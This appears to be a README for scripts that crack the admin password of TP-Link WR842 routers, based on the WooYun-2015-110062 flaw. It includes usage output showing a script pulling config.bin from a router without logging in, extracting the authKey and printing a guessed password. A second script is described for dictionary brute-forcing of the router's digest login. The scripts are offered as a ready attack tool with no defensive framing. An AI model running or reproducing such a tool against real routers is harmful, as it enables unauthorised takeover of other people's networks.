Some scripts for cracking routers.
For cracking the password of the TP-Link WR842 router.
Based on 'WooYun-2015-110062'; modified from the auth_key calculator (thanks to the author: 青岛小哥).
I transformed the decrypt section of the original file, which was written in HTML and JavaScript.
It's not difficult to transform JavaScript to Python, and I also learnt some tips:
- new Array(15): in Python, it should be [[0 for i in xrange(15)] for i in range(15)]
- for(var i=0;i<15;i++): in Python, it's for i in xrange(0,15): (easy).
- str.charAt(index): in Python, it's just str[index].
- str.charCodeAt(index): in Python, we can use ord(str[index]).
- String.fromCharCode(i): in Python, we can use chr(i).
- Just as String.fromCharCode(i) is the reverse of str.charCodeAt(index), chr(i) is the reverse function of ord(str[index]).
For more information about the bug, see this cached page: WooYun-2015-110062.
└─[$] <> python wr842.py -h
usage: wr842.py [-h] [-u URL] [-k AUTHKEY]
optional arguments:
-h, --help show this help message and exit
-u URL the url of router
-k AUTHKEY authKey
└─[$] <> python wr842.py -u 192.168.0.1
--2017-08-02 01:27:59-- http://192.168.0.1/config.bin
Connecting to 192.168.0.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19728 (19K) [x-bin/octet-stream]
Saving to: ‘/tmp/config.bin’
/tmp/config.bin 100%[===================>] 19.27K --.-KB/s in 0.03s
2017-08-02 01:27:59 (578 KB/s) - ‘/tmp/config.bin’ saved [19728/19728]
[*] get config.bin!
[*] get authKey!
[*] authKey:0rZily4W9TefbwK
(1;JW
9t{
8
(3S^
0H
+9Nf
1Phu}
7c
or
└─[$] <> python wr842.py -k 0rZily4W9TefbwK
(1;JW
9t{
8
(3S^
0H
+9Nf
1Phu}
7c
guess password: 19830917
Brute-force cracking of the router login's digest auth.
You can get a dict_file from "dict.rar".
